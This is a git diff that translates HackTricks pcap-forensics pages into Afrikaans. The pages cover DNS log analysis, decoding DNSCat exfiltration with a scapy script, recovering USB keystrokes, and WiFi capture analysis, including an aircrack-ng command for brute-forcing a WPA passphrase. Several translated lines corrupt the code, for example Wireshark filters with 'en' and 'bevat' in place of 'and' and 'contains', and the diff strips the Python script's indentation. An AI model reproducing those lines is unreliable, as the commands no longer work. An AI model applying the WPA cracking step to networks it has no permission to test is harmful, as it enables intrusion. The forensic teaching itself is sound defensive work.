1,10.55.100.111,165.227.216.194,20054,92,29,52,1,52,7774,20053,0,0,0,0
0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0
```
### DNS-inligting
### DNS info
DNS (Domain Name System) is 'n protokol wat gebruik word om IP-adresse aan domeinname te koppel. Dit vertaal mensverstaanbare domeinname na numeriese IP-adresse wat deur rekenaars gebruik word om met mekaar te kommunikeer.
DNS-inligting kan waardevol wees vir forensiese ondersoeke, omdat dit kan help om die aktiwiteite van 'n gebruiker of 'n aanvaller te identifiseer. Deur 'n PCAP (Packet Capture) te ondersoek, kan jy DNS-verkeer analiseer en inligting verkry soos die IP-adresse van besoekte webwerwe, DNS-navrae en DNS-antwoorde.
Hier is 'n paar nuttige DNS-inligting wat jy uit 'n PCAP kan ontleed:
#### DNS-navrae
DNS-navrae is versoek wat deur 'n rekenaar gestuur word om die IP-adres van 'n spesifieke domeinnaam te bekom. Dit kan aandui watter webwerwe of dienste besoek is.
#### DNS-antwoorde
DNS-antwoorde is die reaksies wat deur DNS-bedieners gestuur word om die IP-adres van 'n gevraagde domeinnaam te verskaf. Dit kan aandui watter IP-adresse besoek is en of daar enige ongewone of verdagte aktiwiteite plaasgevind het.
#### DNS-tydskrifte
DNS-tydskrifte is 'n log van DNS-navrae en -antwoorde wat deur 'n rekenaar gestuur en ontvang is. Dit kan gebruik word om die volledige DNS-geskiedenis van 'n rekenaar te ontleed en te analiseer.
#### DNS-gebruikers
DNS-gebruikers is die rekenaars of toestelle wat DNS-navrae en -antwoorde genereer. Deur die identifisering van hierdie gebruikers kan jy die bron van 'n spesifieke DNS-verkeer bepaal.
#### DNS-tydskrif-analise
DNS-tydskrif-analise behels die ontleed van DNS-tydskrifte om inligting te verkry oor die aktiwiteite van 'n rekenaar of netwerk. Dit kan help om verdagte aktiwiteite, soos die besoek van skadelike webwerwe of die kommunikasie met verdagte IP-adresse, te identifiseer.
Deur die inspeksie van DNS-inligting in 'n PCAP, kan jy waardevolle insigte verkry oor die aktiwiteite van 'n rekenaar of netwerk en dit gebruik vir forensiese analise.
```bash
#Get info about each DNS request performed
cat dns.log | zeek-cut -c id.orig_h query qtype_name answers
@ -234,8 +290,7 @@ cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr
#See top DNS domain requested with rita
rita show-exploded-dns -H --limit 10 zeek_logs
```
## Other pcap analysis tricks
## Ander pcap-analise-truuks
{% content-ref url="dnscat-exfiltration.md" %}
[dnscat-exfiltration.md](dnscat-exfiltration.md)
@ -253,20 +308,20 @@ rita show-exploded-dns -H --limit 10 zeek_logs
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline.
{% embed url="https://www.rootedcon.com/" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>

60
forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
View file

@ -1,65 +1,57 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
If you have pcap with data being **exfiltrated by DNSCat** (without using encryption), you can find the exfiltrated content.
You only need to know that the **first 9 bytes** are not real data but are related to the **C\&C communication**:
As jy 'n pcap het met data wat **deur DNSCat uitgelekte word** (sonder om versleuteling te gebruik), kan jy die uitgelekte inhoud vind.
Jy hoef net te weet dat die **eerste 9 byte** nie werklike data is nie, maar verband hou met die **C\&C-kommunikasie**:
```python
from scapy.all import rdpcap, DNSQR, DNSRR
import struct
import struct
f = ""
last = ""
for p in rdpcap('ch21.pcap'):
if p.haslayer(DNSQR) and not p.haslayer(DNSRR):
if p.haslayer(DNSQR) and not p.haslayer(DNSRR):
qry = p[DNSQR].qname.replace(".jz-n-bs.local.","").strip().split(".")
qry = ''.join(_.decode('hex') for _ in qry)[9:]
if last != qry:
print(qry)
f += qry
last = qry
qry = p[DNSQR].qname.replace(".jz-n-bs.local.","").strip().split(".")
qry = ''.join(_.decode('hex') for _ in qry)[9:]
if last != qry:
print(qry)
f += qry
last = qry
#print(f)
```
For more information: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
Vir meer inligting: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
[https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md)
There is a script that works with Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
Daar is 'n skripsie wat met Python3 werk: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
```
python3 dnscat_decoder.py sample.pcap bad_domain
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

40
forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md
View file

@ -1,27 +1,25 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
If you have a pcap of a USB connection with a lot of Interruptions probably it is a USB Keyboard connection.
As jy 'n pcap het van 'n USB-verbinding met baie onderbrekings, is dit waarskynlik 'n USB-toetsbordverbinding.
A wireshark filter like this could be useful: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)`
'n Wireshark-filter soos hierdie kan nuttig wees: `usb.transfer_type == 0x01 en frame.len == 35 en !(usb.capdata == 00:00:00:00:00:00:00:00)`
It could be important to know that the data that starts with "02" is pressed using shift.
Dit kan belangrik wees om te weet dat die data wat met "02" begin, gedruk word deur die Shift-knoppie.
You can read more information and find some scripts about how to analyse this in:
Jy kan meer inligting lees en sommige skripte vind oor hoe om dit te analiseer in:
* [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
* [https://github.com/tanc7/HacktheBox\_Deadly\_Arthropod\_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
@ -30,16 +28,14 @@ You can read more information and find some scripts about how to analyse this in
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

42
forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
View file

@ -1,34 +1,28 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
If you have a pcap containing the communication via USB of a keyboard like the following one:
As jy 'n pcap het wat die kommunikasie via USB van 'n sleutelbord bevat, soos die volgende een:
![](<../../../.gitbook/assets/image (613).png>)
You can use the tool [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) to get what was written in the communication:
Jy kan die instrument [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) gebruik om te sien wat in die kommunikasie geskryf is:
```bash
tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt
python3 usbkeyboard.py ./keystrokes.txt
```
You can read more information and find some scripts about how to analyse this in:
Jy kan meer inligting lees en sommige skripte vind oor hoe om dit te analiseer in:
* [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
* [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
@ -36,16 +30,14 @@ You can read more information and find some scripts about how to analyse this in
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>

58
forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
View file

@ -1,23 +1,21 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
# Check BSSIDs
# Kontroleer BSSIDs
When you receive a capture whose principal traffic is Wifi using WireShark you can start investigating all the SSIDs of the capture with _Wireless --> WLAN Traffic_:
Wanneer jy 'n vangste ontvang waarvan die hoofverkeer Wifi is en jy gebruik WireShark, kan jy begin ondersoek instel na al die SSIDs van die vangste met _Wireless --> WLAN Traffic_:
![](<../../../.gitbook/assets/image (424).png>)
@ -25,31 +23,29 @@ When you receive a capture whose principal traffic is Wifi using WireShark you c
## Brute Force
One of the columns of that screen indicates if **any authentication was found inside the pcap**. If that is the case you can try to Brute force it using `aircrack-ng`:
Een van die kolomme van daardie skerm dui aan of **enige outentifikasie binne die pcap gevind is**. As dit die geval is, kan jy probeer om dit te Brute force deur `aircrack-ng` te gebruik:
```bash
aircrack-ng -w pwds-file.txt -b <BSSID> file.pcap
```
Byvoorbeeld, dit sal die WPA-wagwoord herwin wat 'n PSK (vooraf gedeelde sleutel) beskerm, wat later nodig sal wees om die verkeer te ontsleutel.
For example it will retrieve the WPA passphrase protecting a PSK (pre shared-key), that will be required to decrypt the trafic later.
# Data in Beacons / Sykanaal
# Data in Beacons / Side Channel
As jy vermoed dat **data binne beacons van 'n WiFi-netwerk uitgelek word**, kan jy die beacons van die netwerk ondersoek deur 'n filter soos die volgende te gebruik: `wlan bevat <NAAMvanNETWERK>`, of `wlan.ssid == "NAAMvanNETWERK"` soek binne die gefiltreerde pakkies vir verdagte strings.
If you suspect that **data is being leaked inside beacons of a Wifi network** you can check the beacons of the network using a filter like the following one: `wlan contains <NAMEofNETWORK>`, or `wlan.ssid == "NAMEofNETWORK"` search inside the filtered packets for suspicious strings.
# Vind Onbekende MAC-adresse in 'n WiFi-netwerk
# Find Unknown MAC Addresses in A Wifi Network
The following link will be useful to find the **machines sending data inside a Wifi Network**:
Die volgende skakel sal nuttig wees om die **toestelle wat data binne 'n WiFi-netwerk stuur** te vind:
* `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2`
If you already know **MAC addresses you can remove them from the output** adding checks like this one: `&& !(wlan.addr==5c:51:88:31:a0:3b)`
As jy reeds **MAC-adresse ken, kan jy dit uit die uitset verwyder** deur kontroles soos hierdie een by te voeg: `&& !(wlan.addr==5c:51:88:31:a0:3b)`
Once you have detected **unknown MAC** addresses communicating inside the network you can use **filters** like the following one: `wlan.addr==<MAC address> && (ftp || http || ssh || telnet)` to filter its traffic. Note that ftp/http/ssh/telnet filters are useful if you have decrypted the traffic.
Nadat jy **onbekende MAC-adresse wat binne die netwerk kommunikeer, opgespoor het**, kan jy **filters** soos die volgende een gebruik: `wlan.addr==<MAC-adres> && (ftp || http || ssh || telnet)` om die verkeer te filtreer. Let daarop dat ftp/http/ssh/telnet-filters nuttig is as jy die verkeer ontsluit het.
# Decrypt Traffic
# Ontsleutel Verkeer
Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit
Wysig --> Voorkeure --> Protokolle --> IEEE 802.11 --> Wysig
![](<../../../.gitbook/assets/image (426).png>)
@ -59,16 +55,14 @@ Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

146
forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
View file

@ -1,183 +1,181 @@
# Wireshark tricks
# Wireshark-truuks
## Wireshark tricks
## Wireshark-truuks
<details>
